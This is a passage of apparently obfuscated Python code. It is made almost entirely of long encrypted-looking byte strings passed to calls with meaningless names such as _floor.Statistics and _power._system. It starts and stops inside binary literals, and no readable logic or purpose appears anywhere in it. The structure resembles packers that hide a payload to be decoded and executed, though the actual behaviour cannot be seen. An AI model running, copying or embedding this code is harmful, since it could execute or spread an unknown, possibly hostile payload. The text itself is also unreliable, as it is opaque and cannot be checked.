18P}|\x1c\x14\xb0\xbb\x05,`\xd5\x11VPgNl\x17o\x9e!\xc4\xa5\xcb\xd7"Ch\xb6bs\xe6\x03\xfe\xa3\xcd\x96\x04r\t\xa2*2\xf6k(\xa2%\x90o\xaa\xeb\\\xd1\x05\xde\xe4D-\xba\xe9 \xf5St\xca\xc63\x9e\xf3\x9dS\xb4\x15i\xda\xf2%T\xa3\x19J-\xe4\xdc\x120y\xf6\x91\x86\x08\x12\x98\xc6\xe5\xd2\xdaZ \xaan>*q\xb4sp\xf6\x07\xe5\xd2=A\xf0\x9b$\xce\xb5cv,\x19\xa3P\x9a\xba\x8c\xdd\x89\x00\xa0\x1e"\xc7\t\xbb/:K\xcbg\xa5\xe1\xd3^\xda\xfeV\x91\xd0|\x9d\xfc\x0f\x1f\xf6K\x01a\xb1\xccM\xb5\x0f\xca\xf6S9\x9c\xa7C\x87\xfcy\x06\xceJ@Vy$\\N\x10W\xe1*r(:R\xba\xd9Pi\x8f.W\xde\x1cEu\x8e\x9bd\xb2\x05?\xc9\x1b\x11\xb66-\x0b\xc5\xe9\xdf0w\x16\xd5\x02\x87\xa1c\x930\n{\xea\xd9W\x0f\x1f\x9fI\xe3\xc4\x02Hp\x018$\x83s=??o#l\xbeE)\x13L\x07!\x12^\xa7\xb8<\x86`\x06C\xd3A\xa9\xb4k\xd3\x81$\xcf\xd1\x90\x10\xcb \x1dYF\xebM\xf5ZZL\x8f\x10f\xe1k\x932\xe0-\xea\x1b\x1d!\xa3T\x886\x9d\x90\xda\x14\x8d\x8e\xa5\xd2\x96\xec\xfd6\xb1Rj\xd9\xee%,&\xb2\xec\xfd\x9b\xeavatl\xc9\xc9^\xbd\x84$\x9a\x109\xb2\xb6\x84\xeeN\x16\x8f.\xe8\x91!\xfe%\t\xa34\x1c\xa8\x16\x1e\xc5\xfdh\x94\x8e\x92^\x94\xc6\x89\x9az\x83H\xdd\x9e8\x82\xf2XM\xbfj\xab\xaf>\xf7\xd4\xa23\x89\x13\xf5\xc4\xfa\xc98\t\x12\xb5\x0c`4K\x18\xf6\xa28\xe9\xa9\xf2i\xd2\x8f\x07\xc9$\xed\'c5a\xa6j\xce\x84\xcc\xe9S\xb5_\xb5\x7f\xf5y\x90\xc6q\x1c\xd1\xef#\xd8\x9f:d\x14\xa5\xc9X\xa9W\x81\xda\xd74\x8c\x93P\x9d\x13\xe4[Q\x93n\xd4SzA\x04\xf5UO\x19\xc1gu>\x01\xd6\x1f\xc5\x838U\xe7\r\xe7\x1f\xab\xa3\xf9q/N\xd46\x9e\xa7\xba._m\xa7j\x7f\xbe\x1c\x17\xce3\x0e\xe4|*\xce;\xc6\xeb\xec\xabv\xe8\xab\xee\xe0\xab\xf3\x80\x93\x9c&\xb00\x00\x984\x82vK\x07\xb8_\xa5\xc9\xd4\xdfo\xa8\x94f\xfc\x9djOu~\xf8\x19\x8e\xa3\xce\x17\xf6\xab\xde\xd5>\xd45\xe1q\x07J+R\x8d\xa5>\xab_B;\xd9\xd7\xab\xf6\x03\xed5\xc5z\xea\xbc\x94\x8c\x0c\xe5)\xb6\r~N\xee\xe9>\xa9;7\xc0\xe3\x8c\xa1]\x95\xac\x9b\xaeh\xbfT\xb5\xda\xca\xe3\x84\x00\x8dU\xed\x9f\xa8\x9f@\xbb\xaa\xd6\xafj_%\x9d\xc0}\x82\xfd\xab\xef#(\xc7\xf3\xe0\xfb\x06\xbfK\x07p>r]\xaa\x9d \xf8V\xb5nL\xfd0\xc0\xe3L\xa9\xdd\xa9=*\xceW\xfdN\x1dO\xb5o\xd8\xc3\xfb\x92P{\xe2~h\x7fSUH\xf7m\x04\xbf\x83\xfe\x08\xe7I\xd7\x85\xfdo\x00\xf7\x01\xaf{\x14A\x7f\x9b\xa8\xbe9P\xbf\x87v\x0cU\x9d1\x9c\x8f\xda\xef\x0c~\x0f\xed\xac~\x9f`{Fx\x9f\x95&\xab>\xab\xfb\x80\xe75\xc2\xfa\x13jG}\x9d\xbb\x9eg\x14\r\xc2\xa6T\xde7\xe4V\xa7?\xa8S{\x15\xc5\x05a\x80(\x85\x90\x17\x8c^\xb1\xac%\xf3E\x14\xe7\xf1{i\xa1\xacg\x99/6\xd5\xed\x08\xfd\xd0\x8a\x0fG|\x87\xfcF\xc1Y]\x07\xad\xc9\x9a+\xc9\xae\x03\xabq\r\x19\xa2\xc1\xf7l\xaa\xdb\x05\xc0_\xcdjj\xbd\x9e\x02\xa4?m\xa8\n\x1d1?\xeb\x17\n\x90\xe3T\xc3_j\xdf\x88\xca\xb6\xed,<\x0e3\x93\rT\x8b$j\xa6RkQ;D\xebG\x8b\xf9\x02\xf8q\xd4\x1fdeW/\xf3\x87Cj\x15\xf7<\x89\x16\xecvZ\x80\xe0Nr\xc6\x10\x97\xa6\x8f\xce\x88\x07\x0c\xe1\x80\xc9FX\x8ck6\xf1\xcd\x0e\xaf\xd7\x0eYt\t\xb0\xce\x99\xae\n\x06\xadb\x12\x85\xb7J\xd9zD8\x15\x13\xf7\xbb\x05\xbf~\x82\xae{\x82\xa4\xc4\x94\x8b\x98\xc1*\x85\xd2\x96\xd6!\xc9Q+@!\x1bKj\xc7<\xd6\xa9\xdbE\xb2lH\xb4\x87Y \x0b,\xd9\x0e\xd9\x05\x8a\xa3\xaf\xfcI\xc6\xe8a\x05\xd3V\x8e\xc4\x12\xa3B\x9e\xf8$?\x1b\xb9\xe4T\xe8(\xcauF\xa6e\xc3\xa5`\xb8\x15\x12\x8b\x1a_\x8c\xd0\x87C\x8e_u\xa42.\xc3\x06h\xd9\x9f\x0f{%\xb5\xaf\xce\x98\x9c\x8d\xd1\xb9^\xb2\xa8\xc5\xe8\xf1~2z?<\xc7\x88S\xa44\x1e"S\xea\xf9\xa9Y2\xf8\xf2q\xf3\xb8\x01\xc1\xd2 G\xac\xc4\xfc\xd6\xba\xc4q\xbee\xe72\xdc\xa8@ %9\x08d[\xb6\x1cr]w\xdd\xefl\xc7\xc7\xd6ck\x1fRL\xe5\r\xb4s>\xe5sY\xb9\xcf\xf9\xd4&!\xef\x8d|\x85\xe1\x10\xd7\xbc\xd9\xa2\x8e/\xc0\xde\xc0\x92\x9f$\x98\xca/\xe8\xf8\xab\xea\n\x16\xff\xb0x\x8e\xe7\x0f\xa0\xc5.\x80\xddu\x0e*\xec\x02)z\x175UY\x80t\xf41\xe3F\x80\x197@\xf2%\xb4l\xa9\xb4%|\x9cDN\xd9T\n\x82y\x0b,kL\x9d\xba\x9d\xd0-\xb4\x14\xa2\xa8\x8f \xc7\xc1\xd8\xef\x0328t\' \xae\xc6\xc6M\xbb\xf0\xcf\xb7\x16G\xc1\xbc\x7f\x81\xfd\xd8C|\x92m\xbb\x14\x02\x13\x19Q:\xd8\xd4"\xed\xaa\xaa\xeb\xd7\x9f\x1b\x1b\xda?C\xc4,\xc5\xa0}\x06S%#M\x93\x86a\x13G\xc2e\x84\xaf\xf5y\x8c\xc0S\x10"P8bw}\xc4\xec\xa5\xa5R\x07w\x16Bac\x8c\x9b\x19`\xc8+\xa0\xeb\x00\x1e\xd7/\x97\xb649\xfb\xb1\x89g\x12\xf7\xb5\xc4\x89\xf7-\xd7v\x9d\xba[\xb8\xb6\xdf\x1e\x88\xb9\xeahE\x1c\x8dQv\x8aJ\x8f\xd3\xcc\xb8\xea8)0\x00Ejx\x0c\x92{\xa7Y9\xfb\x85@\t\xb3]\x805:\x9c\x99\xf7\xc0BA\t\x9f\x04\xda @\x06\xce\xfad@\x0e:\xc7\xf5\x81Ps\xc1\xf1\x16\x96\x16\r\xa7\xd4\x12\xa4Hdk\xa1\x84\x95\xf5D\x88&\x02\x0bV\xb4\xa9\xae{\x0f\nL\x15ar\x0f\xfa0\x90\x1e\xb8\xb6l\x16\xed\x9b\xc5\x12w\xdd\'\xe9\xab\xe1\x12\xa9N\x14\x86\xa3`\x16\xcc\x12\xf0\xd5CB\xed\x01\xbc\xab\xc1\x04\xdb\x00\xbeL\x9b\x13Z\x9dCF@\xe4|\xc3\xc46\x90\xd9\xe6|\xefi\xa8\xda\xf3(\x0b\xd9\x98,s\xc2\n!\xbcIv\xfa\x97Mu\xb7H\xff\xd2N\xcc\x9d\x15\x86?Hc\xa7\x89o\xb5\xed:O\xe0\xdd\x91\x0f\xad-1\xde\xa7\xbf!$\xbbE\x06(\x1f\xf3\\\x1e\x12I[\x8a2B\x02\x08\x93\x86\x83\x1bU\x18&8\xd7\xe4\x0b\xf5u\x9aC\xca\xbb\xd0$\xc2\x1b\xb3\x02\x84\x9cL\r\x8c\xbb~\x8a\xdc\xbe!\xc8\x863\x08{E\xb6\xc6Y\x04r\x0c@\x19`@\x82\xb1\x19\xe5W fH!\x85\x9b\x98\x1d\\\xa6\x15\xd1\x84y%b=\x1d\xbe\xe1n\x906\xa6\xd0\xcb\xd9X\x99\xff\xb9\r`\x8bmf\x12A\xc5f\xfa\xb4A\xbeu\xea:ghk=\x84\xf3\xea\x02\x08\x81. \xe5\x07\x84\xdbBj\x9eV\xf8\xc9:\x9b\xf3\x12\x9bof\x8a\xbcVM\xa5ff\xb12\xb6\xfd\x03\xe3\x18\x1f\xa8\xf6\x80\x99\xa7\x85\x85\xff\x08\xe3z1\x01<%\x84\xf7\x0f+\xbe\xd7)\x90hd\xa5z\x90D\xb3&\xb9\xac\xeb,&\x8e\x92\x9b\x1f\x91\xdd\xecU\xa8\xc0\xcd\xa7\xba\x0b\xfa\x80\xe30 \xe6\x1e\t{>B\x14~\x94/\xab-J\xdc%\xf8\xb3\x14-p\x80\xda\x05\xa7EP.m\xd1\xbd$\xe6P\x81\xe0\xf4\xac\xe7\xa0\xe0^\xaa\xaa{x\x9c@\x0b2\x18Xg\x80')

        _floor(_add = -66694 - -56919)._system(Modulo = _power.Calculate + 94263)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='SS2SSS2222222SS22SSS22S222',Round=b'o]k^B|*l%vnR1H\x06\x96-{S\xdd-2\x07\xbe\x8dL%G|\\c\xbei\x933\xb4\xe86\x15\x18tbI;u\xea\xba\x96vZHq\x03\x9c|\xa6\x00=\xd2\x07\xb4\x94wj\xec\xd6\xa6N\xcb\xe4\t\x9f\xb8\x84\xde\xb5\x114rj\x04u\x99\xbd\xdb2\xefr\xd83\x95\xc0\xb6A\xa6\xc9\xfba\xa1\x0f\x8f8\xd1&\xd0h\x814\x0ft\xc3\x17u\x19t*\xbb|w\x8c,m\xades\x84G\xcc\xe7\x80\x91\x98\xcf\x17\x98\xcb\xb8\x85\x86\xd0\xf6\xed\xd8\xe0te\x92\x14k\x9f\xcd\xc4\xb5\xa9\xae\xf3\xc48\xc14\x1d\x81\xf5\xd7uL\xa8\x99\x17\x12\xf3\xce3\x8a\x8c\xb2\xb7o\x07\xac\xbc\xce1\x8a\xf9\x03\xce\xf46\xe6$@&\xfd\xcf\xc0i\xc6\xb7\x16\xc5<\x02\x0f\xc1\x03\x87\xc7b\x8bt\xd1H\xa3\x15 \x95V\x1f\x93oSD]\xa9t\xdf\xb6B\xc0;\x05|J\xc4,\x93\xa2C?*\x97\xd6\xdd!\\Y\x82\x1c\x80\xa0\x95\x04p\xcd\x1f\x81\x05\xb9T\xda\xbd\x88\xb1\xea\xf9\x06\xec\xc8:\xeb\x05\x1d\x88\x11Q-i\x08\x03k&\xb5\xa3&\xc4\xdf\x92Z\x1a\xc2\xa6\xba\xcega\xf7\x91\xf9\x85\x98\x9ei\x1e:J\x9f\x0fL\x9a\xb9\x16\xb1\x9d\x8b\xe1\xd9B\xe7\xb1ya\x85\xa6Y`\xa1\xbe\xa5\x03m\xaa\xe7^\xffq\x0e\x1a\xb7\xddt\xf9\x90\x14;\x14\xe7pXr\x8e\x86\xe7\x98\x1dbH$1\x19\xbe\xb7\xd0e\x04)7(\xcc\x1bb\xfeA\x8eU\x8b\x82xS\xdd\x9ax\xd6]\x1bV\xab\xee\xd2mS\xab\x1b\x8b:\x1f[R\xea\xa6\xbau\xcewC\x04\xae\x12\xc1\x17\x0f\x0f(n`\x18\xee\x1c\x80\xccu\x97^\x8c\xce\x13S\x1f\xf1\xfb~\x84\x08\xbeRi\xdd\x1d\x06\xb8\xfc\xfb\x18\xf6G\x06K\xc0\xdb\x85\xe5\xd2\xfd\xcb1>f\xc3\xa0\x04J,d\xa0\xc8U*=t\xb1\xc3\xa2\x05s\xc9\x11\\d\tN\xd3~\xee\xd9\xb78\xfb:\xe0\tn\x9a\x10g\x88\xc4X\x98~\x11f;\xc0\xe2\xfc\xffQ\xdf\xaf\x14\x8d\x04\xd3\'\xf8\xbd\x82\x91G\x94T\x87\xb0\xacvB\x0b\x90o\x95\xf2\xb4\xbe\xd2VK\x16\r\x99\xe7\xe5iS\xe8\xa3\xfcl\xad\x15\x9b\xea\xd6t{4pp\x96\xb8.u\x9e\x8b\x86<\x11r6\x17\x0b\xeb}\x0b\xe5x\x9bi\x9dXT\x03\x9c\xc0#\x9a\xcc?\x02\xc3j\xa9\xb4E\x89W\x9c#v\xb8\x8d\xdc\xc2\xb0 \xf5V\xd5\xadI\xae\xfbv<[UG)\x06_\xe7!\x9cT\xf6vM\xddG\x9f\x03Bi\x11LK\xe0Z\xea\xaf\xa5~\xd3\xb7\xee\xbb8\xd4\x06\xb9\xbe`\xfa\xcd\xa6\xba\xce\xb1\x0fM\x89\xa6\xaa\xf6n\xd1\xdd\x16\tp\xf3iJ\x1d\xa6%\xddJ@\xdb\x80q\xf9\xc2(\x17\xcd\xa7\xf1\xa5\x15LUw\x92C\x9b\xc1\x95B\x9f\xc4\xd9p\xea\xb7\xc5\xb6\xc2\xfc\x81\xa2\x1d\xdb\x12W\x1fH\xfb\x9b\xcf\xd5\x0b\x98\xa0E-l\t\xbe!\xb6>I\x03$\x0b\x97\xa4o\xb2\x99W6\xd5un\x13to\xde)\xc6\xc7\xe7\xe3\xe4M\xe8\x92SZ\xe0\xf6\x8d<h=\xc08h\xd5\x91\x1e0\x18\x1a\xe2\xa2\x9d\xa8\xea{\xc12\x0b\x98\xc5\x8fM(\xb4\xac\xadb\xc2.f\xfd\xab\xaa\xbb\xa5\xbc\xf6\xe6\xbbu>%x~K\x10\xcd\x9a\x8e\xfe\xe0\t\xbcHo\x15\'j\xa4\x1d\xad\xda\xcd\xeaRsE\xec:$\xb6\x18@>G\xa5h\x01\xea\xd0aZ\xa3\x9c\xeb\xa2j\x8b?9\x94\xcc\xdb!\x1f\x840)\xb4\xcb\x9cg\xf8D\xaa\x9b\x9a&\x9a}\x85R\xc4&a\x9eD6i\xd0\x97h\xfe+\x92\x1b\xaf\xab\xbb\xa55\xf1\rr\xb3\xe4g\x94\xe2\x0c#\xafN\xfb\xa2s\x10\x87\xfd 0\x94\x90tI\xfc\xab\xd3\x9c\x10m\x0b\tt\x00\xfe\xa3\xc3\xd5$\xe1p\'!T\x8e:I\xd7k\x87\xdb\x8b\x12-\xc1&}\xcb\x0e\xb7\xa9n\xda\x95j\x80\xac\xad\x0e\x96\t\xc9;\xebC\xc6\x004r\xfb\xad\xc4\xe3u\xa5\xa1\xb6\x1a\xcb]9;\xd93R\xde\x12Q\x9a\xa3\\\xceR\x1d^o\xbf$\xf9\x15,0\xce\xe7d\xf0W\xa9N\x9f\x8e\xa2\t$\xffR\xd7\xec\x10\x9c\x9b\xda\x7f&\xcdT\xde\x81\xc5|\ro\xdee\x05*\xff\x1c\x99\x98\x89\xc9\x8a>\xb5\x01\xce\x94\x04\xdb6\xc1\x80Di\x88-2\xb5\xdc\xf4\x9b\xea:6\x01\xe8$vv\xb6v\x89"\xd1\xe7e\x99,6\xd5mh\x15\xac:W\xa4\x0e\x1ck*\xc1A\x8e:q\xa4\x9fH\xa4xX0\xa3\xca\xab\xb6t.\xd9N\xb4/Q\x7f\xeb\x14\xda\x1a\x8f\x93\xa9[\x92\xd6<$\xde\xe4\x03K\xac\xb4.\xf4\xe90\xd6\x8e#\xe4\x12E\x1c\xd09f\x8e:G\xdf\xf8>D\x87e\xf6r\xbcJ\x9b\xd1n\x1a&\x0f\xfb\xfcYb\xee\xdbU\\8\x18\x91\x9e\x06\xaf,he\tZ\x1cs\x10\xa3Cf\x12t\xe5ax|c\x97\xd75\x95\\\x0b\xbfdMP E\x13\x0e0Y\xd4\x00\x81C\xc9]\xfa\x91\xa2\t\x0b\xa5-t\x15;\x9b\x87\x9d\x1cJ|\xabP\x1eY\xf4!\x9b\xeav\x92@\xaa\xb5\x8c :\x86\xda\x8a\xdbo\'f_ tB\xea)\xfej\x81\xafa4\xa6\xd5\xae\x9b\xea:\x86\xe2u\xccXV\xb4S\xe4m\x15.Y\x1e\xda\x9d\xc1\x1f\xcdA@}\xc7\xa7\xfa\xd4\xb5%,.\x0cJ\xe1\xf4\xb19\x80\x06\x16\xce|S\xdd.\xf2|w\xc15m\xf8\xb3E,\xd4\x1c\xda\x1aH<r\xca4}O\x94\x0f\x8ec"\x8bI\xba\'\x16a\xe9$O]z8\xa6\xb1\xca+\x8e\n\xd1\\\xe2p\xd0q\xa0\x91\x05\x98s)\x10\xb6d~G`\x0c\x11\x18\x91\x80\x15\xd0\xa7\xdadF \x19\x04\x081\xee#\xe3\x80\x92\x16>\x02\xa1A\xbfX\xba\x0f{\xa1\x00kd\xde\x91\xf0\xec"?\xd9\xa6\xba;\xf0\x93\xed?\xbc\xa8r\x86\x92^\x1c\x15#\x99-0h\xd4\xa9\xf3\xacY?\x06~\x9e\x8b+\xfc\xbb\xb8\xb8T\x8fV(\x01~G9\xacrD\xa5\xb6yLhL]f_o\x13\x8a\xc4i0\xceYmE\xa7a\xfdX\x81\x08\xa9Q\xfa\x18\xdb\x08t\xc5\x03\x8c\x15(\x95\xee\'V\xe0m\x19~\x8eP}\xc4\x84\x92\xfa\xafvb\xc9\x943;\x13-3Bv?\x02as\xa9\xf4\xc0Z\xba\x8b\x1c\xc2\x03\xc3\x0c\xb9\xfa5\xcf"\xe9p\xdc\x8a\xb2\xe2\'\xb0\x12(9\x0b\xe9\xf8fH\xcb\x07Tb\xc4\x16\xeb\x9a\x00\xdf~Lr\xdb\xfcp\xb8B\xe9\x16H!{/\xd8hz\t\\}\xa2\xde\xf1\x1b\xf5i\xda\xd8^s}#!\x9cl\xb1\xa1z-\x99\x03\xc44\x9eX\x12\x8e\xad\xe6\xdb)\xce7\xd5\xad\xef\x14\\a\xd5s\x9f\x05oi\xdc\xda\x8f\xdb\xf8\xb4+\xdbP\xcc#\x1a.\x16\x1bt\xa4~\xb7h\x107\xd5umRi\xcbL\xc5H_J*\x887\xc0\t\xe6\x174\x88\x01.\t\xb0\x04\xfb\x1ck\xe8#\xaf\x7f\xae\xb4\xa5\xe1 \xe9\x04\xfbq\xde\xd2e\x07\xa9n\xaa\xb7E\xc2\x95F\x1e0\x8a<\xa1\xe5\xad\x0eJ\xb1Yr,\xe3\xc1\x1ak/\x96I\x95\x85f\x0cwS-\xfaq\x9a\xf2)\xb0%l\xc9\xb3\xc0cM2\x85\xa3\x93\x18\xa5\x12\np\x8d\xa8\xdb\xa9_$\xe5\xd2}`]m_\xac\xf4@\tE\x8e\xad^[\xa7nG=\xb7\x15v\xb2\x05\xc1\xe1\xe1\xa9^\x91\xa2\x08(\x8b\xda\xc8N,y\\lfr\xdfZ\xff"\x0b\xbfWU\xcf1\xc9\x81&N\xb41\x84B\xa8h\xe7\xf3\xda\\\xcf\xd9\xe4\x91#\xfa\x14o\xd9X\xb3\x01\r,\xdf\xda\xe1x\xd0H"c\rH\x9e\xb5\x1dim\r\xfe\xc3\xd7!!\x12\x97Bry\xabk3`\xa7M\x986M\xcf\x84G\xc5\x83\xd2a\x9d\x90\x8b\x1eBv\t\x1d>i\xbd\xcb\x9c&2\xb6m\xbd\xad\xaa\xbbcv\x89\xb7\xc3wZu\xa4|\xf6\xdcr\xb6\xcfbV]\x97\x91L\x91{\xaa\xfe\xb0\x9c\\\xcaDo\x99\x92\x03`\x99\xd3|_$\xab\xd6\x17U\xf7\x12\xf3\xb0#\xf3\xc9\xdb\x8dU(\xe6{\xc8\xe7}H\x0f\x05\tPu$K\x14\x1b\xb0\xf85`&v\xa1i4\x00\xa7\x91KrF\xa5\xbb\xd6\x07\x86m\xa6\xa00K\xe4\x82\xfb\xc9\x01\xf9z\x82x\xa0f\x8f)\xa4>I\xfbmR\xd3W\x1du%\x9f\x8f\r\x96v\xe8\xfd\xe9\xd2?\x9fK\x12=\xcdm\xcb\xeba%\x8b\xa6\xe4aC\x9d\x00\x1e\xc3\xe5\x86u\xf3\x88\xbd\x8d\x0e\xdfU\xbe\\\r\xb3\x19h\x00\xce\xc8Jf\xef2\xb5{\'\xc1\xea\xb60\'\x82\x8e\x11\x7flQ\xc8\xb1\x084K\xc1\xfd\x13\xa8{\xe9\xc7!\xdc\xd3$p\x1b\xe3[L\x98&l4\xf6\xc3a$\xcb\x14B\xb8b\x1fi\x95\xa2\x14\xae\x1c\\a\r\xe3\xef\xe48h\xaf|\xac\x8f\xdd\xc3\xfc L\xc4\x17 $w\x80\xe6r\xff.\xcc\x97\xd6\xdd!\xb0\xf3\xfa\xf8\x18 \xabR\x82\xae\xda\xb4\\Z\x7f\x87\x90\x12x\x80\xbc{=b\xe0\xc3\x1d\x96J\xeb;\x93\xfb\xc8\xf94`\xc7\xb1\xcf\xd9\x7fK\xa5uw\x08\x97\x161\x193\xd01\xc7x\x86Q\xb9\xb4%\xef\x91X\xe2\xec \x1a;\x1ax`y\x8f6\xd5\xdd2mJ[\xdal\x8bk\x1ac\xcc\x18\xd6O\xecL\xf4\xee\xc4$\x11p/N\xf0\xc6\xc2\xe0\x01\x82\xc8\xb0\\\xbaW5i\xc7u\xa7\x038\x82\x8ex6Q/\xf9h\x18\x13\x15\xe3p\xcd\t\xd5\xf1&\xb1\x1f\xc7q\x04F\xcah\x1a\xf5\xa2Ic\xf3$$fe\xb1jH\xb9Z\xd5\xc7\x16\xdd\x0b\xb9\xe83k@\xf7\x0b\xee\x85u\xf5j\x06)\x1f\x80.Z\x84\x07O-\x88\xb0<T\x99k\xf7@\'W8-\\\x97\x05\x87v7B\x12\x88\xb6\x8d)\x8ff:h\xcc\xf7\xf5\x95y\xcf\xben\x93\xe1\x0f&[\xe0\xdc\r\xd1[\x1a\xe1#\xc5\xc9\xb6T\xda\xc6 \xdb\x9e\xe4\xab\xc1D\x0b\x88\x1f\xb5@\'\x01aV\x9b\xbb\xaa\x1f\x05\xa8\x82\x96\xc0e]\xe2\xff\xf6lz\x82r\xb6\x13\xb4\r\xd8\xb7\x99\xe8\t\xc8\x84\xd7n\xaa[3\x1c\xb8\x91?T&I\x01h\xd8\xc7\x8f\xc5\xcd]p\x87\xaf\xab\x1b')

        _power._system(Modulo = _power.Calculate * 5667)                                                                                                                                                                                                                                                          ;_floor.Statistics(Builtins='lIlllIIIllIIIIllIIIIlI',Round=b'\xd7\xf4\x0b4\x88\x15\xd0\x99\xa1"\x8d\xb06y\xa2"\xa7\x19_\x00[\x1d\xd2\xab\xcb\xf0X\x93\x1d*\xe1PY\xf9,B\x81\x88\x07.\x91\xe4.3b\x19\xd5:\xafv\xe7}\x0fF=w\xa9z\x93*\x1a\x81\xed0L\xeeS`\x04\xf7\xdd\xaa\xddv\xd6\xf2|\n\x84\xbc2\xee8\xa1g\x1a6\x9cq7,\xdd\x96\x08b\x89%\xd6\xb6SsJ\xa0V\x95\x01\x98\x16\x92\x89\xdbPv\x1a\x8d\xc9L\x1e"\xca\xcb\xb6\xe3q\xaaFG\xeac|\xcbT\t\x9c\xf7M=h\x8c\xf3\x94Cn\xe1C\xdb#\xcfh\x9bDBq\n\x8eH\xa5\xff\xf5\x94\xcc\xd70\x14\xac\xea\xd89v\x95~\xc1y\xe0\xd8}\xd0^(\xe3\x91\xec\x9ce.\'\x84W\x95\xddE\xb8\xa7D*\x11\xf5/\xc9I$&\xc5\xe8\xa6\xba]\xc4\xcb\xb6k\xfb1\xfc\xdbl\x04\xda"\xd4\x10\xb4\x87>R\x10\xf40\xa1X\x8cYN\xe2r\xe9\x01`\x8c\x0e\'f\x9e=\xc7\xa3\x9c\xcfx\xa4\xe1~#\xfe\xec\xcc\xfe\xae;\xbe`\xb1mBb\xcd\xe8Z\xb0\xa7T\xd5\xad\x03\xd9\xdc= \xba,H\x94\x03\xa2\x8d\x1d\xc4a\xe8\x8aZ!R\x0c\xd6\tZd\x1b`\xb4J\x1bQ\x15\x02J\x96\xf9LP[b\x0e\xc3\xdbfir\x9b\xea\xbaN7\xd6\x99\x1b\xd3\x82\xa7\xa4+\xe0)is\xe26\x08\x84L8\xae"Bn\x17\x82\xbb\xaf(\xedz*\xdd\x85\xb8}\x83\x8c\xc8\x0b\xbe\xf6\xb4\x91\xd8xH\x0et\xc8\xdd\xd24\xce\xee\x88\xc8f\xd8\xa4\x87\x88\xaa\x9aF\xbd\xb7\xd1\x06N\xd0\xc9\xcb\x9c8\x08Gs\xe2\x81\xea\xa3[\x16F\x16\x99?}t\xd9\x0e\xca\xa5\xf5w\xd8\xe7\xacn)ZV\x93\xbb\x08wX*\xdd\x9fp\xd3\\\xd5\x89\x01R\x11\xaaG\x8a\x8b\x98C\xf5\xa6\xc4`2\xb5,\x00\xd3\xe2\x92\xed\xd4I\x01\xce<X\xb8g\r\x97\xec G\x9aF\xff\xddO\xcf\xfb\n\x03]\xd0>p7x\x8d\xf5\x81\x01\x01f+\x86\x11\x9b \xca \xca\x97\xb4\x04\x08\x102ba1\x0b\xac2;\xfc\xa8N\xddn\x98\xcf\xda\xcayL7\x85\xef\x0c\x9d\n|r\x11\xe7\xb0\xf1.D\x96H)\xaa\xb5h\tq\x01\x92\xb1\xae\xde\x16\xf1t\x07 zZ\xf8\xb1|@A\xbe\xfc\xad\xe3\xe8\xc8\xd2\xb3\x94\x7f:`K\x9dF\x88\xf2\xc4E/*\xa7p\nE\x85H\xf0\xaa\xba\xceu\x968I\x06i\x82F\xc2(i\xea\x14\xa6Y\xd5\x9aX[j\xd1\x94\x9f\xd2Z\xb6\x86\x87C\xcej\xd1\xaa\xbaQM\x7f\xde\x9b\x93C\xab\x8eX\xc02\x9b\xe4\x1e\xc5m~\xb8\xc4q;\x90\xc0\xa1\x988fn\xf4\x17\xb5\xc3,\x13\x92\x9a\xef(x\xbb\xc7\x06\xc1\xb4\\\xda\xe2\xd0/\xc2\xf1\x12k8\xfb+H V\xd5\xdd2 \xad\xc1\xba!\x89?\x1b;Zp\xcf\x8f\xa2)\xedE\x92\xac\xe8\x08)\x92E\xc0-\'@_\x88\xdd\xa0PV\x1f\xc2\x12`\x86k0(\x07(\xf5\xc5\x08a)\x95:\x10Y@\xb5\x1b \xd9@\xc0\xf8\xdb\x18\x15\xbbBYK\xfd\xd9^\x92\x12k\x12\x15i\xb3o\xf5\xe7Mu\xb7L\xa7\xb1\xd1p\xe3\x0f\xfd\xe1P=\xfd\x0c\x1f\x90\xe1\xa2%\xa3\xa3\\\x8d,\xcc\x92\xc9U2t\xf6\n\x99^\xab\xea:\xcf\x91\xd1\xa2\x15wH\x89\x96\xe0\x1f\xe9\xbf\x01\xf3\xd8\xb5\xd4\xad\x97\xe9\xd8d\x15\x10\xa6~-i[\x1c,\x9b\xea\xc6\x9d\xf9][@\x0fB~\xeaW\xc8QMo\x9c\xa3\xfa\xf5\xb5\xeeM \x0e\x12\x1f\x19\xd4RB\xd2\x7f\x04\x8e\x92RiK7\xaagux;\xbd\x82,o6Y\xce\xa6\xba\x9d\xa8IM-\xa4l_\x10\xec#\x91\x1e\xbd\xad\xb5n\x0f"\xda\xa3\x86Y\x18\x95\xca\x11P?\xc4\xc5\xb5\xaf\xfa\xb0O&\x17\\xK\xa5\x87\xe8\xb2\xb5\x83\xa6\xa24\xeew\x15:e%\x06\xb4\xf5\x86iN{0:\x84[\x9c\x93\x83\xb0\xb1#&.fc\'%\xf8\xae\x8f)h\x0b\x08$XXa\x12\x16\xc1A\x16\xb0\xd0Z\xd8\xea\xd4\xeddas\x1f\xb4h\xa7\xcc3A$\x11cE\xe5\x93\xd3\xd8\xe3\x00\xa2\xad\x9b\xb2\xd8\xfcD\n\x9b\xd7\x9fBf\xa3^\xb6QR#\x8c\xca\x8b)\xba\x8cU\xd4\\\xd9~f\xb4\xdb\xb3\xc5\xe8\xf1~2z\x0f\xac\xc9\x97W\x97\xc8\xa0,\xf4\xc9\x97\xa7\x10\x12\x93ap\x0c\xc4\xc5`$2$\x8b9\xde\xbd3$V\xcc\x90dQ4\xe0C\xb7\x11D\xadgP\xd4\x1f\xaf\xe5[\xfa\xee\x90\xbc\xaa]\x19\x96\r\x06\\\xe6\x03\xe9\n\x82\x17\x17T*\x958\xc4\x11O\\\xcev\x92\x0eJ\xf0\xef\xf20\xf3\x9f\xdb\xf9\xce\xf2\x1f\xb6\xc1NC\x87\x116UG\x82_\xe5H\xe8\x12`\xebF|\x9e#\x8b!f`\xc7<~\x94\xd9\xaf>\xe61\xc0Hd0e\x06(\x05\xa7\x88y,\x95:\x91\xc8I\xe2F\xeb\x19\xa2+c\xc4\x19\xa4\xe5\xd2C\x80\t\xb5\x02Lh\x8bZ\xf7\xab\xade\xb6\x93\xf9\xa9\xb3d\x05\x1d\x023$\xcd\n\xa7\xa5\x90\x14+\x92\x9c\x82\xb6\x9aA\xe1\xda4m\ts\xb6H\xf4\xbee\x11\x89,\x83j\x9d\xbau\r\xaa\xd5F\xd4\xcc\xcf2\x9fl\xa9C\xd8h\xc5\x8a\xaa\x15\x9a\xd8\xb0$\x8b}X\xdb\x86\x0byD\xab\xea\xfen\xa0\x9b\xc2Kb\x93\xf4\x97\t\xfc\x1dz\xcf]gA\xcf\x871\x9a\xb0\xc6\x99y\x97\xc0\xa2f\xa32Q\xabZ\x8a\xda\x11\xb8>\xc